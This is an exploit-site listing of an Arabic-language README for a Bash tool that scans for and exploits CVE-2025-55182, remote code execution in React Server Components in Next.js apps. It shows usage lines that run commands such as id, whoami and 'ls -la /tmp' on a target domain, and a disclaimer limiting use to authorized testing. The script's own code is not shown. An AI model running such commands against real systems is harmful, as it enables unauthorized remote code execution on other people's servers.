Sploitus

Exploit for POC

kitploit · 2026-09-01

Exploit Code

MARKDOWN66 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IAMBLACKSOLO2-BUGBOUNTY-POC-CVE-2025-55182
# ماسح CVE-2025-55182

أداة سطر أوامر بسيطة لاكتشاف واستغلال CVE-2025-55182 (تنفيذ الأكواد عن بُعد في مكونات خادم React) في تطبيقات Next.js. ![scanner](https://assets.kitploit.com/production/public/readmes/26787/4336482c6af8c27064c936f77c9b792b17d265cd1613847985e2fb93e9aa62b7.png)

## التثبيت

root@kitploit:~
    
    
    chmod +x scanner.sh
    

## الاستخدام

root@kitploit:~
    
    
    # فحص باستخدام الأمر الافتراضي (id)
    ./scanner.sh -d example.com
    
    # تنفيذ أمر مخصص
    ./scanner.sh -d example.com -c "whoami"
    
    # باستخدام رابط كامل
    ./scanner.sh -d https://example.com -c "uname -a"
    

## الخيارات

  * `-d, --domain` \- النطاق/الرابط المستهدف (مطلوب)
  * `-c, --command` \- الأمر المراد تنفيذه (الافتراضي: `id`)



## أمثلة

root@kitploit:~
    
    
    # التحقق مما إذا كان الهدف ضعيفًا
    ./scanner.sh -d vulnerable-app.com
    
    # الحصول على معلومات النظام
    ./scanner.sh -d vulnerable-app.com -c "uname -a"
    
    # عرض الملفات
    ./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
    

## المتطلبات

  * Bash
  * curl
  * openssl



## إخلاء مسؤولية

هذه الأداة لأغراض **التعليم واختبار الأمان المصرح به فقط**. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك الإذن باختبارها.

## المراجع

  * CVE-2025-55182
  * تنبيه أمان React